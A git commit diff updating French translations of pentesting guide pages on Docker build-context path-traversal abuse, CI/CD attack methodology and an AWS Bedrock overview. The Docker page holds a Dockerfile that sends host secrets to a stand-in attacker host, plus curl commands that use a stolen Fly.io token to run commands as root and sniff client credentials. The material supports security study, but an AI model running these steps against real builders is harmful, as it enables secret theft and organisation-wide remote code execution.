Translated ['src/pentesting-cloud/aws-security/aws-services/aws-bedrock-

This commit is contained in:
Translator
2025-10-25 22:33:34 +00:00
parent 38031612c8
commit 29b9eec756
3 changed files with 66 additions and 66 deletions

View File

@@ -1,29 +1,29 @@
# Abuser le Docker Build Context dans des hosted builders (Path Traversal, Exfil, and Cloud Pivot)
# Abuser du Docker Build Context dans les builders hébergés (Path Traversal, Exfil, and Cloud Pivot)
{{#include ../banners/hacktricks-training.md}}
## TL;DR
Si une plateforme CI/CD ou un hosted builder permet aux contributeurs de spécifier le chemin du Docker build context et le chemin du Dockerfile, vous pouvez souvent définir le contexte sur un répertoire parent (par ex., "..") et inclure des fichiers de l'hôte dans le build context. Ensuite, un Dockerfile contrôlé par l'attaquant peut COPY et exfiltrate des secrets trouvés dans le répertoire home de l'utilisateur du builder (par exemple, ~/.docker/config.json). Des registry tokens volés peuvent aussi fonctionner contre les control-plane APIs du provider, permettant un RCE à l'échelle de l'organisation.
Si une plateforme CI/CD ou un hosted builder permet aux contributeurs de spécifier le chemin du Docker build context et le chemin du Dockerfile, vous pouvez souvent définir le contexte sur un répertoire parent (par ex., "..") et inclure des fichiers de lhôte dans le build context. Ensuite, un Dockerfile contrôlé par lattaquant peut utiliser COPY et exfiltrate des secrets trouvés dans le home de lutilisateur du builder (par exemple ~/.docker/config.json). Des registry tokens volés peuvent aussi fonctionner contre les control-plane APIs du fournisseur, permettant un RCE à léchelle de lorganisation.
## Surface d'attaque
Beaucoup de services hosted builder/registry font à peu près ceci lors de la construction d'images soumises par des utilisateurs :
- Lire une config au niveau du repo qui inclut :
- build context path (envoyé au Docker daemon)
- Dockerfile path relative à ce contexte
Beaucoup de services de hosted builder/registry font grosso modo ceci lors de la construction dimages soumises par des utilisateurs :
- Lire une configuration au niveau du repo qui inclut :
- build context path (envoyé au Docker daemon)
- Dockerfile path relatif à ce contexte
- Copier le répertoire du build context indiqué et le Dockerfile vers le Docker daemon
- Builder l'image et l'exécuter comme service hébergé
- Build limage et lexécuter comme service hébergé
Si la plateforme ne canonicalise pas et ne restreint pas le build context, un utilisateur peut le définir vers un emplacement en dehors du repository (path traversal), ce qui fait que des fichiers arbitraires de l'hôte lisibles par l'utilisateur de build deviennent partie du build context et sont disponibles pour COPY dans le Dockerfile.
Si la plateforme ne canonise pas et ne restreint pas le build context, un utilisateur peut le définir sur un emplacement en dehors du dépôt (path traversal), faisant en sorte que des fichiers arbitraires de lhôte lisibles par lutilisateur de build deviennent partie du build context et disponibles pour COPY dans le Dockerfile.
Contraintes pratiques couramment observées :
- Le Dockerfile doit se trouver à l'intérieur du chemin de contexte choisi et son chemin doit être connu à l'avance.
- L'utilisateur de build doit avoir un accès en lecture aux fichiers inclus dans le contexte ; des fichiers de périphérique spéciaux peuvent casser la copie.
- Le Dockerfile doit résider dans le chemin de contexte choisi et son chemin doit être connu à lavance.
- Lutilisateur de build doit avoir un accès en lecture aux fichiers inclus dans le contexte ; des fichiers device spéciaux peuvent casser la copie.
## PoC: Path traversal via Docker build context
Exemple de config serveur malveillante déclarant un Dockerfile à l'intérieur du contexte du répertoire parent :
Exemple de config de serveur malveillant déclarant un Dockerfile dans le contexte du répertoire parent :
```yaml
runtime: "container"
build:
@@ -40,11 +40,11 @@ required: ["apiKey"]
exampleConfig:
apiKey: "sk-example123"
```
Remarques :
- L'utilisation de ".." résout souvent vers le répertoire home de l'utilisateur builder (e.g., /home/builder), qui contient typiquement des fichiers sensibles.
- Placez votre Dockerfile sous le nom du répertoire du repo (e.g., repo "test" → test/Dockerfile) afin qu'il reste dans le contexte parent étendu.
Remarques:
- L'utilisation de ".." se résout souvent vers le répertoire home de lutilisateur builder (p.ex., /home/builder), qui contient typiquement des fichiers sensibles.
- Placez votre Dockerfile sous le nom de répertoire du repo (p.ex., repo "test" → test/Dockerfile) afin qu'il reste dans le contexte parent étendu.
## PoC : Dockerfile pour ingérer et exfiltrer le contexte de l'hôte
## PoC: Dockerfile pour ingérer et exfiltrer le contexte de l'hôte
```dockerfile
FROM alpine
RUN apk add --no-cache curl
@@ -54,32 +54,32 @@ RUN curl -si https://attacker.tld/?d=$(find /data | base64 -w 0)
```
Cibles couramment récupérées depuis $HOME :
- ~/.docker/config.json (registry auths/tokens)
- Autres caches et configs cloud/CLI (par ex., ~/.fly, ~/.kube, ~/.aws, ~/.config/*)
- Autres caches et configs cloud/CLI (p. ex., ~/.fly, ~/.kube, ~/.aws, ~/.config/*)
Astuce : Même avec un .dockerignore dans le dépôt, la sélection du contexte côté plateforme vulnérable détermine toujours ce qui est envoyé au daemon. Si la plateforme copie le chemin choisi vers le daemon avant d'évaluer le .dockerignore de votre repo, des fichiers hôtes peuvent quand même être exposés.
Astuce : Même avec un .dockerignore dans le dépôt, la sélection de contexte côté plateforme vulnérable détermine toujours ce qui est envoyé au daemon. Si la plateforme copie le chemin choisi vers le daemon avant d'évaluer le .dockerignore de votre repo, des fichiers hôtes peuvent encore être exposés.
## Cloud pivot with overprivileged tokens (example: Fly.io Machines API)
Certaines plateformes émettent un seul bearer token utilisable à la fois pour le container registry et l'control-plane API. Si vous exfiltrez un registry token, essayez-le contre l'API du provider.
Certaines plateformes émettent un seul bearer token utilisable à la fois pour le container registry et l'API control-plane. Si vous exfiltrez un registry token, essayez-le contre l'API du provider.
Exemples d'appels API contre Fly.io Machines API en utilisant le token volé depuis ~/.docker/config.json :
Énumérer les apps dans une org :
Enumerate apps in an org:
```bash
curl -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps?org_slug=smithery"
```
Exécuter une commande en tant que root à l'intérieur de n'importe quelle machine d'une application :
Exécuter une commande en tant que root sur n'importe quelle machine d'une app :
```bash
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"","command":["id"],"container":"","stdin":"","timeout":5}'
```
Résultat : remote code execution à l'échelle de l'organisation sur toutes les apps hébergées lorsque le token dispose de privilèges suffisants.
Résultat : org-wide remote code execution sur toutes les applications hébergées lorsque le token dispose de privilèges suffisants.
## Vol de secrets depuis des services hébergés compromis
Avec exec/RCE sur les serveurs hébergés, vous pouvez harvest client-supplied secrets (API keys, tokens) ou lancer des prompt-injection attacks. Exemple : installez tcpdump et capturez le trafic HTTP sur le port 8080 pour extraire les inbound credentials.
Avec exec/RCE sur des serveurs hébergés, vous pouvez récolter des secrets fournis par les clients (API keys, tokens) ou monter des prompt-injection attacks. Exemple : installez tcpdump et capturez le trafic HTTP sur le port 8080 pour extraire les inbound credentials.
```bash
# Install tcpdump inside the machine
curl -s -X POST -H "Authorization: Bearer fm2_..." \
@@ -91,9 +91,9 @@ curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"tcpdump -i eth0 -w /tmp/log tcp port 8080","command":[],"container":"","stdin":"","timeout":5}'
```
Les requêtes capturées contiennent souvent des client credentials dans les headers, bodies, ou query params.
Les requêtes capturées contiennent souvent des identifiants client dans les en-têtes, les corps ou les paramètres de requête.
## References
## Références
- [Breaking MCP Server Hosting: Build-Context Path Traversal to Org-wide RCE and Secret Theft](https://blog.gitguardian.com/breaking-mcp-server-hosting/)
- [Fly.io Machines API](https://fly.io/docs/machines/api/)

View File

@@ -1,4 +1,4 @@
# Méthodologie Pentesting CI/CD
# Méthodologie de Pentesting CI/CD
{{#include ../banners/hacktricks-training.md}}
@@ -6,51 +6,51 @@
## VCS
VCS signifie **système de contrôle de version**, ce système permet aux développeurs de **gérer leur code source**. Le plus courant est **git** et vous trouverez généralement des entreprises qui l'utilisent sur l'une des **plateformes** suivantes :
VCS signifie **système de gestion de versions**, ce système permet aux développeurs de **gérer leur code source**. Le plus courant est **git** et vous trouverez généralement des entreprises l'utilisant sur l'une des **plateformes** suivantes :
- Github
- Gitlab
- Bitbucket
- Gitea
- Gitblit
- Fournisseurs Cloud (ils offrent leurs propres plateformes VCS)
- Cloud providers (they offer their own VCS platforms)
## CI/CD Pipelines
Les pipelines CI/CD permettent aux développeurs d'**automatiser l'exécution du code** pour divers objectifs, notamment la compilation, les tests et le déploiement des applications. Ces workflows automatisés sont **déclenchés par des actions spécifiques**, telles que des push de code, des pull requests ou des tâches planifiées. Ils servent à rationaliser le processus du développement à la production.
Les pipelines CI/CD permettent aux développeurs d'**automatiser l'exécution du code** pour divers usages, notamment la compilation, les tests et le déploiement des applications. Ces workflows automatisés sont **déclenchés par des actions spécifiques**, comme des pushes de code, des pull requests, ou des tâches planifiées. Ils servent à rationaliser le processus du développement à la production.
Cependant, ces systèmes doivent être **exécutés quelque part** et généralement avec des **identifiants privilégiés pour déployer du code ou accéder à des informations sensibles**.
## VCS Pentesting Methodology
## Méthodologie de Pentesting VCS
> [!NOTE]
> Même si certaines plateformes VCS permettent de créer des pipelines pour cette section, nous allons analyser uniquement les attaques potentielles visant le contrôle du code source.
> Même si certaines plateformes VCS permettent de créer des pipelines, pour cette section nous allons analyser uniquement les attaques potentielles visant le contrôle du code source.
Les plateformes qui contiennent le code source de votre projet renferment des informations sensibles et il faut être très vigilant avec les permissions accordées au sein de ces plateformes. Voici quelques problèmes courants sur les plateformes VCS que des attaquants pourraient exploiter :
Les plateformes qui contiennent le code source de votre projet hébergent des informations sensibles et il faut être très prudent quant aux permissions accordées au sein de cette plateforme. Voici quelques problèmes courants sur les plateformes VCS que des attaquants pourraient exploiter :
- **Leaks** : Si votre code contient des leaks dans les commits et que l'attaquant peut accéder au repo (parce qu'il est public ou parce qu'il a un accès), il pourrait découvrir les leaks.
- **Accès** : Si un attaquant peut **accéder à un compte au sein de la plateforme VCS**, il pourrait obtenir **plus de visibilité et de permissions**.
- **Enregistrement** : Certaines plateformes permettent simplement aux utilisateurs externes de créer un compte.
- **SSO** : Certaines plateformes n'autorisent pas l'enregistrement, mais permettent à quiconque de se connecter avec un SSO valide (donc un attaquant pourrait utiliser son compte github pour entrer, par exemple).
- **Credentials** : Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... il existe plusieurs types de tokens qu'un utilisateur pourrait voler pour accéder d'une manière ou d'une autre à un repo.
- **Leaks** : Si votre code contient des leaks dans les commits et que l'attaquant peut accéder au dépôt (parce qu'il est public ou parce qu'il a accès), il pourrait découvrir les leaks.
- **Access** : Si un attaquant peut **accéder à un compte au sein de la plateforme VCS** il pourrait obtenir **plus de visibilité et de permissions**.
- **Inscription** : Certaines plateformes permettent simplement aux utilisateurs externes de créer un compte.
- **SSO** : Certaines plateformes n'autorisent pas l'inscription, mais permettent à quiconque de se connecter avec un SSO valide (donc un attaquant pourrait utiliser par exemple son compte github pour entrer).
- **Credentials** : Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... il existe plusieurs types de tokens qu'un utilisateur pourrait voler pour accéder d'une manière ou d'une autre à un dépôt.
- **Webhooks** : Les plateformes VCS permettent de générer des webhooks. S'ils ne sont **pas protégés** par des secrets non visibles, un **attaquant pourrait en abuser**.
- Si aucun secret n'est en place, l'attaquant pourrait abuser du webhook de la plateforme tierce.
- Si le secret est dans l'URL, la même chose se produit et l'attaquant possède aussi le secret.
- **Compromission du code :** Si un acteur malveillant a un certain type d'**accès en écriture** sur les repos, il pourrait tenter d'**injecter du code malveillant**. Pour réussir, il pourrait devoir **contourner les protections de branche**. Ces actions peuvent être réalisées avec différents objectifs :
- Si le secret est dans l'URL, il en va de même et l'attaquant possède aussi le secret.
- **Code compromise :** Si un acteur malveillant dispose d'une forme d'accès en **écriture** sur les dépôts, il pourrait tenter d'**injecter du code malveillant**. Pour réussir, il pourrait devoir **contourner les protections de branche**. Ces actions peuvent être réalisées avec différents objectifs en tête :
- Compromettre la branche principale pour **compromettre la production**.
- Compromettre la branche principale (ou d'autres branches) pour **compromettre les machines des développeurs** (car ils exécutent généralement des tests, terraform ou d'autres choses depuis le repo sur leurs machines).
- Compromettre la branche principale (ou d'autres branches) pour **compromettre les machines des développeurs** (car ils exécutent souvent des tests, terraform ou d'autres choses depuis le dépôt sur leurs machines).
- **Compromettre le pipeline** (voir section suivante)
## Pipelines Pentesting Methodology
La façon la plus courante de définir un pipeline est d'utiliser un **fichier de configuration CI hébergé dans le repository** que le pipeline construit. Ce fichier décrit l'ordre des jobs exécutés, les conditions qui affectent le flux et les paramètres de l'environnement de build.\
Ces fichiers ont typiquement un nom et un format cohérents, par exemple — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), et les fichiers YAML GitHub Actions situés sous .github/workflows. Lorsqu'il est déclenché, le job du pipeline **récupère le code** depuis la source sélectionnée (par ex. commit / branch), et **exécute les commandes spécifiées dans le fichier de configuration CI** sur ce code.
La façon la plus courante de définir un pipeline est d'utiliser un **fichier de configuration CI hébergé dans le dépôt** que le pipeline construit. Ce fichier décrit l'ordre des jobs exécutés, les conditions qui affectent le flux, et les paramètres de l'environnement de build.\
Ces fichiers portent généralement un nom et un format constants, par exemple — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), et les fichiers YAML GitHub Actions situés sous .github/workflows. Lorsqu'il est déclenché, le job du pipeline **récupère le code** depuis la source sélectionnée (par ex. commit / branch), et **exécute les commandes spécifiées dans le fichier de configuration CI** contre ce code.
Par conséquent, l'objectif ultime de l'attaquant est d'une manière ou d'une autre de **compromettre ces fichiers de configuration** ou les **commandes qu'ils exécutent**.
Ainsi, l'objectif ultime de l'attaquant est en quelque sorte de **compro­mettre ces fichiers de configuration** ou les **commandes qu'ils exécutent**.
> [!TIP]
> Certains builders hébergés laissent les contributeurs choisir le Docker build context et le chemin du Dockerfile. Si le context est contrôlé par l'attaquant, vous pouvez le définir en dehors du repo (p.ex., "..") pour ingérer des fichiers hôtes pendant le build et exfiltrer des secrets. Voir :
> Certains builders hébergés laissent les contributeurs choisir le Docker build context et le chemin du Dockerfile. Si le context est contrôlé par l'attaquant, vous pouvez le définir en dehors du repo (par exemple "..") pour ingérer des fichiers de l'hôte pendant le build et exfiltrer des secrets. Voir :
>
>{{#ref}}
>docker-build-context-abuse.md
@@ -58,40 +58,40 @@ Par conséquent, l'objectif ultime de l'attaquant est d'une manière ou d'une au
### PPE - Poisoned Pipeline Execution
Le chemin Poisoned Pipeline Execution (PPE) exploite des permissions dans un repository SCM pour manipuler un pipeline CI et exécuter des commandes nuisibles. Les utilisateurs disposant des permissions nécessaires peuvent modifier les fichiers de configuration CI ou d'autres fichiers utilisés par le job du pipeline pour y inclure des commandes malveillantes. Cela "empoisonne" le pipeline CI, conduisant à l'exécution de ces commandes malveillantes.
La Poisoned Pipeline Execution (PPE) exploite des permissions dans un repository SCM pour manipuler un pipeline CI et exécuter des commandes malveillantes. Les utilisateurs disposant des permissions nécessaires peuvent modifier les fichiers de configuration CI ou d'autres fichiers utilisés par le job du pipeline pour y inclure des commandes malicieuses. Cela « empoisonne » le pipeline CI, entraînant l'exécution de ces commandes malveillantes.
Pour qu'un acteur malveillant réussisse une attaque PPE, il doit :
Pour qu'un acteur malveillant réussisse une attaque PPE, il doit être capable de :
- Avoir **un accès en écriture à la plateforme VCS**, car en général les pipelines sont déclenchés lorsqu'un push ou une pull request est effectué. (Consultez la méthodologie VCS pour un résumé des moyens d'obtenir un accès).
- Notez que parfois une **PR externe compte comme un "write access"**.
- Même s'il a des permissions d'écriture, il doit s'assurer qu'il peut **modifier le fichier de config CI ou d'autres fichiers dont la config dépend**.
- Avoir **un accès en écriture à la plateforme VCS**, car généralement les pipelines sont déclenchés lors d'un push ou d'une pull request. (Voir la méthodologie VCS pour un résumé des moyens d'obtenir un accès).
- Noter que parfois une **PR externe compte comme un "accès en écriture"**.
- Même s'il dispose de permissions en écriture, il doit s'assurer qu'il peut **modifier le fichier de config CI ou d'autres fichiers sur lesquels le config s'appuie**.
- Pour cela, il pourrait devoir être capable de **contourner les protections de branche**.
Il existe 3 variantes de PPE :
- **D-PPE** : Une attaque **Direct PPE** se produit lorsque l'acteur **modifie le fichier de config CI** qui sera exécuté.
- **I-DDE** : Une attaque **Indirect PPE** se produit lorsque l'acteur **modifie** un **fichier** sur lequel le fichier de config CI s'appuie (comme un makefile ou une config terraform).
- **Public PPE ou 3PE** : Dans certains cas, les pipelines peuvent être **déclenchés par des utilisateurs qui n'ont pas d'accès en écriture au repo** (et qui ne font peutêtre même pas partie de l'org) parce qu'ils peuvent envoyer une PR.
- **3PE Command Injection** : Habituellement, les pipelines CI/CD vont **définir des variables d'environnement** avec **des informations sur la PR**. Si cette valeur peut être contrôlée par un attaquant (comme le titre de la PR) et qu'elle est **utilisée** dans un **endroit dangereux** (comme l'exécution de commandes sh), un attaquant pourrait **y injecter des commandes**.
- **D-PPE** : Une attaque **Direct PPE** se produit lorsque l'acteur **modifie le fichier de config CI** qui va être exécuté.
- **I-DDE** : Une attaque **Indirect PPE** se produit lorsque l'acteur **modifie** un **fichier** sur lequel le fichier de config CI qui va être exécuté **se repose** (comme un makefile ou une config terraform).
- **Public PPE or 3PE** : Dans certains cas, les pipelines peuvent être **déclenchés par des utilisateurs qui n'ont pas d'accès en écriture au dépôt** (et qui peuvent même ne pas faire partie de l'organisation) parce qu'ils peuvent envoyer une PR.
- **3PE Command Injection** : Habituellement, les pipelines CI/CD vont **définir des variables d'environnement** avec **des informations sur la PR**. Si cette valeur peut être contrôlée par un attaquant (comme le titre de la PR) et est **utilisée** dans un **endroit dangereux** (par exemple pour exécuter des commandes sh), un attaquant peut **injecter des commandes**.
### Exploitation Benefits
Connaissant les 3 variantes pour empoisonner un pipeline, voyons ce qu'un attaquant pourrait obtenir après une exploitation réussie :
Connaissant les 3 variantes pour empoisonner un pipeline, voyons ce qu'un attaquant peut obtenir après une exploitation réussie :
- **Secrets** : Comme mentionné précédemment, les pipelines requièrent des **privilèges** pour leurs jobs (récupérer le code, le builder, le déployer...) et ces privilèges sont généralement stockés en **secrets**. Ces secrets sont souvent accessibles via des **variables d'environnement ou des fichiers dans le système**. Par conséquent, un attaquant cherchera toujours à exfiltrer un maximum de secrets.
- Selon la plateforme de pipeline, l'attaquant **pourrait devoir spécifier les secrets dans la config**. Cela signifie que si l'attaquant ne peut pas modifier la configuration CI (**I-PPE** par exemple), il pourrait **seulement exfiltrer les secrets que le pipeline possède**.
- **Computation** : Le code s'exécute quelque part ; selon l'endroit d'exécution, un attaquant pourrait être en mesure de pivoter plus loin.
- **On-Premises** : Si les pipelines sont exécutés on-premises, un attaquant pourrait se retrouver dans un **réseau interne avec accès à davantage de ressources**.
- **Cloud** : L'attaquant pourrait accéder **à d'autres machines dans le cloud** mais aussi pourrait **exfiltrer** des tokens de rôles IAM / service accounts **pour obtenir davantage d'accès dans le cloud**.
- **Machines de la plateforme** : Parfois les jobs seront exécutés dans les **machines de la plateforme de pipelines**, qui sont généralement dans un cloud avec **aucun accès supplémentaire**.
- **Choisir la cible :** Parfois la **plateforme de pipelines aura configuré plusieurs machines** et si vous pouvez **modifier le fichier de configuration CI** vous pouvez **indiquer où vous voulez exécuter le code malveillant**. Dans ce cas, un attaquant lancera probablement une reverse shell sur chaque machine possible pour tenter de l'exploiter davantage.
- **Compromettre la production** : Si vous êtes à l'intérieur du pipeline et que la version finale est construite et déployée depuis celui-ci, vous pourriez **compromettre le code qui sera exécuté en production**.
- **Secrets** : Comme mentionné précédemment, les pipelines nécessitent des **privilèges** pour leurs jobs (récupérer le code, le builder, le déployer...) et ces privilèges sont généralement **fourni via des secrets**. Ces secrets sont souvent accessibles via des **env variables ou des fichiers à l'intérieur du système**. Par conséquent, un attaquant cherchera toujours à exfiltrer autant de secrets que possible.
- Selon la plateforme de pipeline, l'attaquant **pourrait devoir spécifier les secrets dans la config**. Cela signifie que si l'attaquant ne peut pas modifier la configuration du pipeline (**I-PPE** par exemple), il pourrait **ne pouvoir exfiltrer que les secrets que ce pipeline possède**.
- **Computation** : Le code est exécuté quelque part ; selon l'endroit d'exécution, un attaquant peut être en mesure de pivoter plus loin.
- **On-Premises** : Si les pipelines s'exécutent on-premises, un attaquant pourrait se retrouver dans un **réseau interne avec accès à plus de ressources**.
- **Cloud** : L'attaquant pourrait accéder à **d'autres machines dans le cloud** mais aussi pourrait **exfiltrer** des tokens de rôles IAM / service accounts pour obtenir **un accès plus large dans le cloud**.
- **Machines de la plateforme** : Parfois les jobs seront exécutés à l'intérieur des **machines de la plateforme de pipelines**, qui sont généralement dans un cloud sans accès supplémentaire.
- **Sélectionner la cible :** Parfois la **plateforme de pipelines proposera plusieurs machines** et si vous pouvez **modifier le fichier de config CI** vous pouvez **indiquer où vous voulez exécuter le code malveillant**. Dans ce cas, un attaquant lancera probablement un reverse shell sur chaque machine possible pour tenter de l'exploiter davantage.
- **Compromettre la production** : Si vous êtes à l'intérieur du pipeline et que la version finale est buildée et déployée à partir de celui-ci, vous pourriez **compromettre le code qui sera exécuté en production**.
## More relevant info
### Tools & CIS Benchmark
- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) est un outil open-source pour auditer votre stack de supply chain logicielle pour la conformité de sécurité basé sur un nouveau [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). L'audit se concentre sur l'ensemble du processus SDLC, où il peut révéler des risques depuis le temps du code jusqu'au temps de déploiement.
- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) est un outil open-source pour auditer votre stack de software supply chain en matière de conformité sécurité, basé sur un nouveau [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). L'audit se concentre sur l'ensemble du processus SDLC, où il peut révéler des risques depuis le temps du code jusqu'au déploiement.
### Top 10 CI/CD Security Risk
@@ -99,12 +99,12 @@ Consultez cet article intéressant sur les top 10 risques CI/CD selon Cider : [*
### Labs
- Sur chaque plateforme que vous pouvez exécuter localement, vous trouverez comment la lancer localement afin de la configurer comme vous le souhaitez pour la tester
- Sur chaque plateforme que vous pouvez exécuter localement, vous trouverez comment la lancer en local afin de la configurer comme vous le souhaitez pour la tester
- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
### Automatic Tools
- [**Checkov**](https://github.com/bridgecrewio/checkov) : **Checkov** est un outil d'analyse statique pour l'infrastructure-as-code.
- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** est un outil d'analyse statique pour infrastructure-as-code.
## References

View File

@@ -2,9 +2,9 @@
{{#include ../../../banners/hacktricks-training.md}}
## Vue d'ensemble
## Aperçu
Amazon Bedrock est un service entièrement géré qui facilite la création et la mise à l'échelle d'applications d'IA générative en utilisant des modèles fondamentaux (FMs) provenant des principales startups en IA et d'Amazon. Bedrock fournit l'accès à divers FMs via une API unique, permettant aux développeurs de choisir le modèle le plus adapté à leurs cas d'utilisation spécifiques sans gérer l'infrastructure sous-jacente.
Amazon Bedrock est un service entièrement géré qui facilite la création et la mise à l'échelle d'applications d'IA générative en utilisant des modèles de fondation (FMs) provenant de startups d'IA de premier plan et d'Amazon. Bedrock fournit un accès à divers FMs via une API unique, permettant aux développeurs de choisir le modèle le plus adapté à leurs cas d'utilisation spécifiques sans gérer l'infrastructure sous-jacente.
## Post Exploitation